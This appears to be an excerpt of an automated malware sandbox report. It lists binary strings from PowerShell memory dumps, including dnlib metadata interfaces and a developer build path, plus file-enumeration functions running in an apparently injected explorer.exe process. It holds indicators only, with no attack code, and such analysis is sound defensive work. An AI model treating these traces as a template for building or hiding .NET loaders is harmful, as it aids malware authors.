            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: dagifhd, 00000011.00000000.500871936.0000000001082000.00000020.00000001.01000000.00000008.sdmp, dagifhd.15.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,19_2_000C1D4A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,19_2_000C3ED9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,19_2_000C2B15
